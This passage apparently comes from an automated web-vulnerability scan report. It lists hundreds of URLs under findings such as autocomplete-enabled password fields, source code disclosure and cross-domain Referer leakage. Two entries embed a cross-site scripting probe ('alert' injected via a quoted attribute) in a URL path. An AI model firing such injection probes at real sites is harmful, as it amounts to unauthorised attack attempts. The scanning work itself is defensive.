12.740. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&

12.741. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&

12.742. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&

12.743. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&

12.744. http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&height=90&width=728&adType=noframe&

12.745. http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&

12.746. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&

12.747. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=1&

12.748. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=2&

12.749. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=3&

12.750. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=4&

12.751. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&

12.752. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=60&width=468&adType=noframe&

12.753. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=150&width=519&adType=noframe&

12.754. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=90&width=728&adType=noframe&

12.755. http://www.revresda.com/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=left&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991

12.756. http://www.revresda.com/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=right&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991

12.757. http://www.revresda.com/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=top&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991

12.758. https://www.scanalert.com/RatingVerify

12.759. http://www.theworkbuzz.com/career-advice/women-cautious-about-social-media-and-work/

12.760. http://www.theworkbuzz.com/employment-trends/video-interviews/

12.761. http://www.threatfire.com/

12.762. http://www.trip.com/

12.763. http://www.trip.com/index.html

12.764. http://www.untraceableemail.net/boobitrap/eCheck.php

12.765. http://www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html

12.766. http://www.websitetoolbox.com/tool/view/mb/file

12.767. http://www.worldmastiffforum.com/

12.768. http://www.worldmastiffforum.com/file

12.769. http://www.youtube.com/user/sqlrtfm

12.770. http://xcdn.xgraph.net/15530/db/xg.gif

12.771. http://zone.msn.com/en-us/home

13. Password field with autocomplete enabled

13.1. https://ads.pof.com/

13.2. https://ads.pof.com/

13.3. https://ads.pof.com/Default.aspx

13.4. https://ads.pof.com/Default.aspx

13.5. https://ads.pof.com/Default.aspx/%22ns=%22alert(0x000176)

13.6. https://ads.pof.com/Default.aspx/%22ns=%22alert(0x000176)

13.7. https://ads.pof.com/Default.aspx/assets/png/create_your_first_ad.png

13.8. https://ads.pof.com/Default.aspx/assets/png/create_your_first_ad.png

13.9. http://blog.facebook.com/blog.php

13.10. http://boardreader.com/my.html

13.11. http://clickaider.com/

13.12. http://erncpa.com/

13.13. https://gc.synxis.com/rez.aspx

13.14. https://gc.synxis.com/xbe/rez.aspx

13.15. http://it.toolbox.com/blogs/database-soup

13.16. http://it.toolbox.com/blogs/database-talk

13.17. http://it.toolbox.com/blogs/db2luw

13.18. http://it.toolbox.com/blogs/db2zos

13.19. http://it.toolbox.com/blogs/elsua

13.20. http://it.toolbox.com/blogs/juice-analytics

13.21. http://it.toolbox.com/blogs/minimalit

13.22. http://it.toolbox.com/blogs/penguinista-databasiensis

13.23. http://it.toolbox.com/blogs/ppmtoday

13.24. https://login.facebook.com/

13.25. https://login.facebook.com/

13.26. https://login.facebook.com/ajax/intl/language_dialog.php

13.27. https://login.facebook.com/help/

13.28. https://login.facebook.com/login.php

13.29. https://login.facebook.com/r.php

13.30. https://login.facebook.com/r.php

13.31. https://login.facebook.com/r.php

13.32. https://publish.omniture.com/center/

13.33. https://sitesearch.omniture.com/center/

13.34. http://twitter.com/

13.35. http://twitter.com/BWBLLC

13.36. http://twitter.com/BW_Technology

13.37. http://twitter.com/Chester_Pitts

13.38. http://twitter.com/Cirque

13.39. http://twitter.com/JetBlue

13.40. http://twitter.com/JohnsHopkinsSPH

13.41. http://twitter.com/McKQuarterly

13.42. http://twitter.com/MomsWhoSave

13.43. http://twitter.com/NetworkConnects

13.44. http://twitter.com/Nightline

13.45. http://twitter.com/NoReservations

13.46. http://twitter.com/NylonMag

13.47. http://twitter.com/OmnitureEMEA

13.48. http://twitter.com/PeaceCorps

13.49. http://twitter.com/Support

13.50. http://twitter.com/TakeoSpikes51

13.51. http://twitter.com/TomorrowCounsel

13.52. http://twitter.com/VirginiaBeachWk

13.53. http://twitter.com/Wyome655

13.54. http://twitter.com/arnui

13.55. http://twitter.com/ashleytisdale

13.56. http://twitter.com/best_golf

13.57. http://twitter.com/buyantsogtoo

13.58. http://twitter.com/chain_llc

13.59. http://twitter.com/chain_llc_cod

13.60. http://twitter.com/chain_llc_mg

13.61. http://twitter.com/cloudscan

13.62. http://twitter.com/coolmompicks

13.63. http://twitter.com/davidgregory

13.64. http://twitter.com/designmilk

13.65. http://twitter.com/donlomb

13.66. http://twitter.com/gamespot

13.67. http://twitter.com/jasmith579

13.68. http://twitter.com/jobs4writers

13.69. http://twitter.com/ligatt

13.70. http://twitter.com/lijobs_sales

13.71. http://twitter.com/login

13.72. http://twitter.com/millenniumpr

13.73. http://twitter.com/omniture

13.74. http://twitter.com/omniturecare

13.75. http://twitter.com/orbitz

13.76. http://twitter.com/prolawrssfeed

13.77. http://twitter.com/qianam

13.78. http://twitter.com/rosyresources

13.79. http://twitter.com/sarahdessen

13.80. http://twitter.com/science

13.81. http://twitter.com/search

13.82. http://twitter.com/sethmeyers21

13.83. http://twitter.com/sp_arizona

13.84. http://twitter.com/sp_oregon

13.85. http://twitter.com/sp_tx

13.86. http://twitter.com/toptweets/favorites

13.87. https://twitter.com/

13.88. https://twitter.com/login

13.89. https://twitter.com/sessions

13.90. http://wp-superslider.com/

13.91. https://www.astaro.co.uk/beacon/(beid

13.92. https://www.astaro.com/beacon/(beid

13.93. https://www.astaro.com/en/user/login

13.94. https://www.astaro.com/tool/signup

13.95. https://www.astaro.com/user/login

13.96. https://www.astaro.de/beacon/(beid

13.97. https://www.astaro.net/beacon/(beid

13.98. http://www.astaro.org/

13.99. http://www.delish.com/entertaining-ideas/party-ideas/valentines-day-romantic-recipes-tips

13.100. http://www.demandstudios.com/ehow-writers.html

13.101. http://www.ehow.com/account/simple_login.aspx

13.102. http://www.ehow.com/account/simple_register.aspx

13.103. http://www.ehow.com/account/simple_register.aspx

13.104. https://www.ehow.com/account/simple_login.aspx

13.105. https://www.ehow.com/account/simple_register.aspx

13.106. https://www.ehow.com/forms/signin.aspx

13.107. http://www.evow.com/

13.108. http://www.evow.com/

13.109. http://www.facebook.com/

13.110. http://www.facebook.com/

13.111. http://www.facebook.com/%s

13.112. http://www.facebook.com/2008/fbml

13.113. http://www.facebook.com/MillenniumHotels

13.114. http://www.facebook.com/ajax/intl/language_dialog.php

13.115. http://www.facebook.com/btaylor

13.116. http://www.facebook.com/careers/

13.117. http://www.facebook.com/directory/pages/

13.118. http://www.facebook.com/directory/people/

13.119. http://www.facebook.com/facebook

13.120. http://www.facebook.com/help/

13.121. http://www.facebook.com/ligatt

13.122. http://www.facebook.com/platform

13.123. http://www.facebook.com/plugins/facepile.php

13.124. http://www.facebook.com/policy.php

13.125. http://www.facebook.com/privacy/explanation.php

13.126. http://www.facebook.com/r.php

13.127. http://www.facebook.com/r.php

13.128. http://www.facebook.com/r.php

13.129. http://www.facebook.com/r.php

13.130. http://www.facebook.com/terms.php

13.131. https://www.facebook.com/

13.132. https://www.facebook.com/

13.133. https://www.facebook.com/2008/fbml

13.134. https://www.facebook.com/login.php

13.135. https://www.google.com/accounts/Login

13.136. http://www.hotelclub.com/

13.137. https://www.orbitz.com/Secure/SignIn

13.138. https://www.orbitz.com/account/login

13.139. https://www.orbitz.com/account/registration

13.140. https://www.orbitz.com/trips/writeReview

13.141. http://www.plentyoffish.com/

13.142. http://www.plentyoffish.com/inbox.aspx

13.143. http://www.plentyoffish.com/meetme.aspx

13.144. http://www.plentyoffish.com/needs_test.aspx

13.145. http://www.plentyoffish.com/poftest.aspx

13.146. http://www.plentyoffish.com/poftest.aspx

13.147. http://www.plentyoffish.com/seriousintro.aspx

13.148. http://www.ratedesi.com/

13.149. http://www.ratedesi.com/

13.150. http://www.ratestogo.com/

13.151. http://www.reddit.com/domain/static.2mdn.net/new/x22

13.152. http://www.reddit.com/domain/static.2mdn.net/new/x22

13.153. http://www.reddit.com/domain/static.2mdn.net/x22

13.154. http://www.reddit.com/domain/static.2mdn.net/x22

13.155. http://www.shape.com/workouts/articles/blood_sugar.html

13.156. http://www.shape.com/workouts/articles/workout_schedule.html

13.157. http://www.threatexpert.com/signin.aspx

13.158. http://www.threatexpert.com/signup.aspx

13.159. http://www.untraceableemail.net/boobitrap/eCheck.php

13.160. http://www.worldmastiffforum.com/

14. Source code disclosure

14.1. http://fitbie.msn.com/

14.2. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

14.3. http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab

14.4. https://gc.synxis.com/xbe/scripts/xbe.js

14.5. https://login.hitbox.com/images/001982.banner_viralvideo_v1.hbx923x320.jpg

14.6. http://meyerweb.com/eric/tools/css/reset/

14.7. http://trw.com/00_assets/02_videos/Orb_Loop.flv

14.8. http://updates.orbitz.com/pos/ocom/coBrand/msn/orbitzmsn.css

14.9. http://www.addthis.com/bookmark.php

14.10. http://www.ehow.com/about_us/about_us.aspx

14.11. http://www.orbitz.com/shared/js/global.js

14.12. http://www.plentyoffish.com/helperb.js

15. Referer-dependent response

15.1. http://ad.yieldmanager.com/imp

15.2. http://ads.adbrite.com/adserver/vdi/762701

15.3. http://api.bizographics.com/v1/profile.json

15.4. http://www.facebook.com/plugins/activity.php

15.5. http://www.facebook.com/plugins/like.php

16. Cross-domain POST

16.1. http://dillerdesign.com/experiment/DD_belatedPNG/

16.2. http://erncpa.com/

16.3. http://erncpa.com/

16.4. http://gsgd.co.uk/sandbox/jquery/easing/

16.5. http://leandrovieira.com/projects/jquery/lightbox/

16.6. http://lifestyle.msn.com/your-life/new-year-new-you/article.aspx

16.7. https://my.omniture.com/support_popup_form.html

16.8. http://trw.mediaroom.com/index.php

16.9. http://www.dillerdesign.com/experiment/DD_belatedPNG/

16.10. http://www.huddletogether.com/projects/lightbox2/

16.11. http://www.milleniumdental.net/

16.12. http://www.neaq.org/index.php

16.13. http://www.techmynd.com/cross-site-scripting-attacks-xss/

16.14. http://www.thefreedomtrail.org/

16.15. http://www.theroot.com/multimedia/50-years-black-history

16.16. http://www.theroot.com/views/2011/young-futurists

16.17. http://www.theroot.com/views/meet-25-people-who-will-change-our-world

17. Cross-domain Referer leakage

17.1. http://a.rad.msn.com/ADSAdClient31.dll

17.2. http://a.rad.msn.com/ADSAdClient31.dll

17.3. http://a.rad.msn.com/ADSAdClient31.dll

17.4. http://a.rad.msn.com/ADSAdClient31.dll

17.5. http://a.rad.msn.com/ADSAdClient31.dll

17.6. http://a0.twimg.com/a/1296609216/stylesheets/fronts.css

17.7. http://a3.twimg.com/a/1296609216/javascripts/widgets/widget.js

17.8. http://acslinda.websitetoolbox.com/file

17.9. http://acslinda.websitetoolbox.com/file

17.10. http://acslinda.websitetoolbox.com/file

17.11. http://acslinda.websitetoolbox.com/file

17.12. http://acslinda.websitetoolbox.com/file

17.13. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033

17.14. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033

17.15. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033

17.16. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24

17.17. http://ad.doubleclick.net/adi/N3285.google/B2343920.91

17.18. http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67

17.19. http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67

17.20. http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67

17.21. http://ad.doubleclick.net/adi/N3466.8451.ORBITZLLC/B4967866.3

17.22. http://ad.doubleclick.net/adi/N3466.8451.ORBITZLLC/B4967866.3

17.23. http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.11

17.24. http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.4

17.25. http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.5

17.26. http://ad.doubleclick.net/adi/N553.msn.com/B5114832.2

17.27. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.5

17.28. http://ad.doubleclick.net/adi/dmd.ehow/computers

17.29. http://ad.doubleclick.net/adi/dmd.ehow/homepage

17.30. http://ad.doubleclick.net/adj/ami.mf.fitness/abs

17.31. http://ad.doubleclick.net/adj/ami.mf.fitness/abs

17.32. http://ad.doubleclick.net/adj/ami.mf.fitness/abs

17.33. http://ad.doubleclick.net/adj/ami.mf.fitness/abs

17.34. http://ad.doubleclick.net/adj/ami.mf.fitness/abs

17.35. http://ad.doubleclick.net/adj/ami.mf.fitness/abs

17.36. http://ad.doubleclick.net/adj/ami.mf.fitness/abs

17.37. http://ad.doubleclick.net/adj/ami.mf.home/

17.38. http://ad.doubleclick.net/adj/dmd.ehow/computers

17.39. http://ad.doubleclick.net/adj/dmd.ehow/gen

17.40. http://ad.doubleclick.net/adj/dmd.ehow/homepage

17.41. http://ad.doubleclick.net/adj/dmd.ehow/homepage

17.42. http://ad.harrenmedianetwork.com/st

17.43. http://ad.harrenmedianetwork.com/st

17.44. http://ad.reduxmedia.com/st

17.45. http://ad.scanmedios.com/st

17.46. http://ad.yieldmanager.com/iframe3

17.47. http://ad.yieldmanager.com/iframe3

17.48. http://ad.yieldmanager.com/iframe3

17.49. http://ad.yieldmanager.com/iframe3

17.50. http://ad.yieldmanager.com/iframe3

17.51. http://adadvisor.net/adscores/g.js

17.52. https://blekko.com/join

17.53. https://blekko.com/login

17.54. http://blog.facebook.com/blog.php

17.55. http://boardreader.com/a/2mdn.net/x22

17.56. http://boardreader.com/affiliate/gagbanner.html

17.57. http://boardreader.com/domain/2mdn.net/x22

17.58. http://boardreader.com/domain/aol.com

17.59. http://boardreader.com/domain/cafemom.com

17.60. http://boardreader.com/domain/myegy.com

17.61. http://boardreader.com/domain/ratedesi.com

17.62. http://boardreader.com/domain/sherdog.net

17.63. http://boardreader.com/domain/ufc.com

17.64. http://boardreader.com/domain/websitetoolbox.com

17.65. http://boardreader.com/domain/worldmastiffforum.com

17.66. http://boardreader.com/index.php

17.67. http://businessonmain.msn.com/browseresources/articles/firststeps.aspx

17.68. http://businessonmain.msn.com/browseresources/articles/managingemployees.aspx

17.69. http://businessonmain.msn.com/questions/default.aspx

17.70. http://businessonmain.msn.com/videos/coolrunnings.aspx

17.71. http://can.monster.com/cookie-technology.aspx

17.72. http://ccc01.opinionlab.com/o.asp

17.73. http://cms.ad.yieldmanager.net/v1/cms

17.74. http://cosmiclog.msnbc.msn.com/_news/2011/01/31/5962284-jerusalem-videos-stir-ufo-buzz

17.75. http://dating.msn.com/index.aspx

17.76. http://dating.msn.com/search/index.aspx

17.77. http://dating.msn.com/search/index.aspx

17.78. http://developers.facebook.com/

17.79. http://docs.google.com/viewer

17.80. http://entertainment.msn.com/news/

17.81. http://entertainment.msn.com/video/

17.82. http://fitbie.msn.com/lose-weight/tips/reasons-youre-destined-weight-loss-success

17.83. https://gc.synxis.com/XBE/Popups/InfoPopup.aspx

17.84. https://gc.synxis.com/rez.aspx

17.85. https://gc.synxis.com/xbe/rez.aspx

17.86. https://gc.synxis.com/xbe/rez.aspx

17.87. https://gc.synxis.com/xbe/rez.aspx

17.88. https://gc.synxis.com/xbe/rez.aspx

17.89. http://glo.msn.com/living/celebrity-home-collections-6350.gallery

17.90. http://gocitykids.parentsconnect.com/data/service-calendar.json

17.91. http://googleads.g.doubleclick.net/pagead/ads

17.92. http://googleads.g.doubleclick.net/pagead/ads

17.93. http://googleads.g.doubleclick.net/pagead/ads

17.94. http://googleads.g.doubleclick.net/pagead/ads

17.95. http://googleads.g.doubleclick.net/pagead/ads

17.96. http://googleads.g.doubleclick.net/pagead/ads

17.97. http://googleads.g.doubleclick.net/pagead/ads

17.98. http://googleads.g.doubleclick.net/pagead/ads

17.99. http://googleads.g.doubleclick.net/pagead/ads

17.100. http://googleads.g.doubleclick.net/pagead/ads

17.101. http://googleads.g.doubleclick.net/pagead/ads

17.102. http://googleads.g.doubleclick.net/pagead/ads

17.103. http://googleads.g.doubleclick.net/pagead/ads

17.104. http://googleads.g.doubleclick.net/pagead/ads

17.105. http://googleads.g.doubleclick.net/pagead/ads

17.106. http://googleads.g.doubleclick.net/pagead/ads

17.107. http://googleads.g.doubleclick.net/pagead/ads

17.108. http://googleads.g.doubleclick.net/pagead/ads

17.109. http://googleads.g.doubleclick.net/pagead/ads

17.110. http://googleads.g.doubleclick.net/pagead/ads

17.111. http://googleads.g.doubleclick.net/pagead/ads

17.112. http://googleads.g.doubleclick.net/pagead/ads

17.113. http://googleads.g.doubleclick.net/pagead/ads

17.114. http://googleads.g.doubleclick.net/pagead/ads

17.115. http://googleads.g.doubleclick.net/pagead/ads

17.116. http://googleads.g.doubleclick.net/pagead/ads

17.117. http://googleads.g.doubleclick.net/pagead/ads

17.118. http://googleads.g.doubleclick.net/pagead/ads

17.119. http://groups.google.com/groups

17.120. http://groups.google.com/groups

17.121. http://health.msn.com/health-topics/quit-smoking/articlepage.aspx

17.122. http://investing.money.msn.com/investments/stock-price

17.123. http://lifestyle.msn.com/relationships/staticslideshowglamour.aspx

17.124. http://lifestyle.msn.com/relationships/your-money-today/article.aspx

17.125. http://lifestyle.msn.com/your-home/cleaning-organizing/staticslideshowrs.aspx

17.126. http://lifestyle.msn.com/your-life/family-fun/staticslideshowrs.aspx

17.127. http://lifestyle.msn.com/your-life/new-year-new-you/article.aspx

17.128. http://lifestyle.msn.com/your-look/celebrity-style/staticslideshowmc.aspx

17.129. http://lifestyle.msn.com/your-look/everyday-style/staticslideshowglamour.aspx

17.130. http://lifestyle.msn.com/your-look/everyday-style/staticslideshowlucky.aspx

17.131. http://lifestyle.msn.com/your-look/well-groomed-male/staticslideshowgq.aspx

17.132. http://local.msn.com/hourly.aspx

17.133. http://local.msn.com/movies-events.aspx

17.134. http://local.msn.com/news.aspx

17.135. http://local.msn.com/sports.aspx

17.136. http://local.msn.com/ten-day.aspx

17.137. http://local.msn.com/weather.aspx

17.138. http://local.msn.com/weather.aspx

17.139. http://login.live.com/login.srf

17.140. https://login.live.com/login.srf

17.141. https://login.live.com/login.srf

17.142. http://maps.google.com/local_url

17.143. http://maps.google.com/maps

17.144. http://maps.google.com/maps

17.145. http://maps.google.com/maps

17.146. http://maps.google.com/maps

17.147. http://maps.google.com/maps/place

17.148. http://maps.google.com/maps/place

17.149. http://maps.google.com/maps/place

17.150. http://movies.msn.com/movies/article.aspx

17.151. http://music.msn.com/music/article.aspx

17.152. https://my.omniture.com/p/suite/1.2/index.html

17.153. http://picasaweb.google.com/lh/view

17.154. https://picasaweb.google.com/lh/view

17.155. http://pingomatic.com/ping/

17.156. https://publish.omniture.com/center/util/

17.157. http://rad.msn.com/ADSAdClient31.dll

17.158. http://rad.msn.com/ADSAdClient31.dll

17.159. http://rad.msn.com/ADSAdClient31.dll

17.160. http://rad.msn.com/ADSAdClient31.dll

17.161. http://rad.msn.com/ADSAdClient31.dll

17.162. http://rad.msn.com/ADSAdClient31.dll

17.163. http://rad.msn.com/ADSAdClient31.dll

17.164. http://realestate.msn.com/slideshow.aspx

17.165. http://scholar.google.com/scholar

17.166. http://scholar.google.com/scholar

17.167. http://search.twitter.com/search

17.168. https://secure.avangate.com/order/checkout.php

17.169. https://secure.opinionlab.com/ccc01/o.asp

17.170. http://seg.sharethis.com/getSegment.php

17.171. http://seg.sharethis.com/getSegment.php

17.172. http://seg.sharethis.com/getSegment.php

17.173. http://seg.sharethis.com/getSegment.php

17.174. https://sitesearch.omniture.com/center/util/

17.175. http://social.entertainment.msn.com/movies/blogs/the-hitlist-blog.aspx

17.176. http://social.entertainment.msn.com/tv/blogs/reality-tv-blog.aspx

17.177. http://sociallist.org/submit.php

17.178. http://specials.msn.com/A-List/Entertainment/Ali-Larters-baby-story.aspx

17.179. http://specials.msn.com/A-List/Entertainment/Britney-Spears-as-maid-of-honor.aspx

17.180. http://specials.msn.com/A-List/Entertainment/Famous-young-fashionistas.aspx

17.181. http://specials.msn.com/A-List/Entertainment/Hip-hop-pioneer-hospitalized.aspx

17.182. http://specials.msn.com/A-List/Entertainment/Javier-Bardem-as-Bond.aspx

17.183. http://specials.msn.com/A-List/Entertainment/Most-wanted-celebrity-body-parts.aspx

17.184. http://specials.msn.com/A-List/Entertainment/New-Superman-chosen.aspx

17.185. http://specials.msn.com/A-List/Entertainment/Ozzy-cancels-Reno-show.aspx

17.186. http://specials.msn.com/A-List/Lifestyle/African-American-History.aspx

17.187. http://specials.msn.com/A-List/Lifestyle/Best-home-remedies.aspx

17.188. http://specials.msn.com/A-List/Lifestyle/January-2011-quotes-of-the-month.aspx

17.189. http://specials.msn.com/A-List/Lifestyle/Man-jailed-for-defecating-in-store.aspx

17.190. http://specials.msn.com/A-List/Lifestyle/Monk-charged-under-anti-smoking-law.aspx

17.191. http://specials.msn.com/A-List/Lifestyle/No-bail-for-mom-who-killed-kids.aspx

17.192. http://specials.msn.com/A-List/Lifestyle/Police-break-up-fight-at-N.C.-church.aspx

17.193. http://specials.msn.com/A-List/Lifestyle/Sled-dogs-slaughtered.aspx

17.194. http://specials.msn.com/A-List/Lifestyle/Teens-arrested-in-kidnapping-assault.aspx

17.195. http://specials.msn.com/IEIncreaseFont_preview.aspx

17.196. http://technolog.msnbc.msn.com/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink/from/toolbar

17.197. http://technolog.msnbc.msn.com/_news/2011/01/31/5962042-quadriplegic-man-sets-record-for-fastest-hands-free-typing

17.198. http://today.msnbc.msn.com/id/41299602/ns/today-today_fashion_and_beauty/

17.199. http://today.msnbc.msn.com/id/41302280/ns/today-entertainment/

17.200. http://translate.google.com/translate_t

17.201. http://translate.google.com/translate_t

17.202. http://tv.msn.com/last-night-on-tv/

17.203. http://tv.msn.com/tv/article.aspx

17.204. http://twitter.com/

17.205. http://twitter.com/newtwitter

17.206. http://twitter.com/search

17.207. http://twitter.com/search

17.208. http://twitter.com/search

17.209. http://twitter.com/search

17.210. http://twitter.com/share

17.211. http://webcache.googleusercontent.com/search

17.212. http://wonderwall.msn.com/movies/best-actor-nominees-2011-11135.gallery

17.213. http://wonderwall.msn.com/movies/gwyneth-paltrow-wanted-to-scrap-goop-to-halt-criticism-1594220.story

17.214. http://wonderwall.msn.com/movies/halle-berry-set-to-battle-model-ex-over-custody-1594335.story

17.215. http://wonderwall.msn.com/movies/kelly-mcgillis-hid-sexuality-for-kids-sake-1594256.story

17.216. http://wonderwall.msn.com/movies/nicole-kidman-raising-baby-faith-margaret-is-beyond-thrilling-1594332.story

17.217. http://www.addthis.com/bookmark.php

17.218. http://www.astaro.com/newsletter

17.219. http://www.astaro.com/sites/all/modules/images/lightbox2/js/lightbox_video.js

17.220. http://www.autocheck.com/

17.221. http://www.bing.com/

17.222. http://www.bing.com/images/results.aspx

17.223. http://www.bing.com/maps/

17.224. http://www.bing.com/maps/default.aspx

17.225. http://www.bing.com/maps/explore/

17.226. http://www.bing.com/news/search

17.227. http://www.bing.com/news/search

17.228. http://www.bing.com/travel/

17.229. http://www.bing.com/travel/content/search

17.230. http://www.bing.com/travel/content/search

17.231. http://www.bing.com/travel/deals/airline-ticket-deals.do

17.232. http://www.bing.com/videos/browse

17.233. http://www.bing.com/videos/watch/video/earthquake-proof-bridge/pfu8x7j

17.234. http://www.bing.com/videos/watch/video/ice-cube-talks-tv-film-and-music/6vztnpj

17.235. http://www.bing.com/videos/watch/video/jay-mohr-part-1/17wj9ueo7

17.236. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

17.237. http://www.bing.com/videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k

17.238. http://www.demandstudios.com/ehow-writers.html

17.239. http://www.ehow.com/MailingList.html

17.240. http://www.ehow.com/MailingList.html

17.241. http://www.ehow.com/account/facebook_merge.aspx

17.242. http://www.ehow.com/account/simple_login.aspx

17.243. http://www.ehow.com/account/simple_register.aspx

17.244. http://www.everydaylifestyles.com/articles3.php

17.245. http://www.facebook.com/ajax/intl/language_dialog.php

17.246. http://www.facebook.com/careers/

17.247. http://www.facebook.com/help/

17.248. http://www.facebook.com/plugins/activity.php

17.249. http://www.facebook.com/plugins/facepile.php

17.250. http://www.facebook.com/plugins/like.php

17.251. http://www.facebook.com/r.php

17.252. http://www.facebook.com/r.php

17.253. http://www.facebook.com/terms.php

17.254. http://www.google.com/advanced_search

17.255. http://www.google.com/coop/profile

17.256. http://www.google.com/finance

17.257. http://www.google.com/finance

17.258. http://www.google.com/finance

17.259. http://www.google.com/finance

17.260. http://www.google.com/finance

17.261. http://www.google.com/ig/adde

17.262. http://www.google.com/images

17.263. http://www.google.com/images

17.264. http://www.google.com/language_tools

17.265. http://www.google.com/preferences

17.266. http://www.google.com/quality_form

17.267. http://www.google.com/search

17.268. http://www.google.com/search

17.269. http://www.google.com/search

17.270. http://www.google.com/search

17.271. http://www.google.com/search

17.272. http://www.google.com/search

17.273. http://www.google.com/search

17.274. http://www.google.com/search

17.275. http://www.google.com/search

17.276. http://www.google.com/search

17.277. http://www.google.com/search

17.278. http://www.google.com/search

17.279. http://www.google.com/search

17.280. http://www.google.com/search

17.281. http://www.google.com/support/chrome/bin/answer.py

17.282. http://www.google.com/support/websearch/bin/answer.py

17.283. http://www.google.com/url

17.284. http://www.google.com/url

17.285. http://www.google.com/url

17.286. http://www.google.com/url

17.287. http://www.google.com/url

17.288. http://www.google.com/webhp

17.289. http://www.invisionpower.com/index.php

17.290. http://www.kampyle.com/

17.291. http://www.ligattsecurity.com/wp-content/plugins/wp-prettyphoto/js/jquery.prettyPhoto.js

17.292. http://www.macromedia.com/shockwave/download/index.cgi

17.293. http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136

17.294. http://www.msn.com/

17.295. http://www.msn.com/

17.296. http://www.msn.com/scp/AuthServiceFacebook.aspx

17.297. http://www.msn.com/scp/AuthServiceFacebookLogOff.aspx

17.298. http://www.msn.com/scp/AuthServiceTwitter.aspx

17.299. http://www.msnbc.msn.com/id/21134540/vp/41348830

17.300. http://www.msnbc.msn.com/id/21134540/vp/41365925

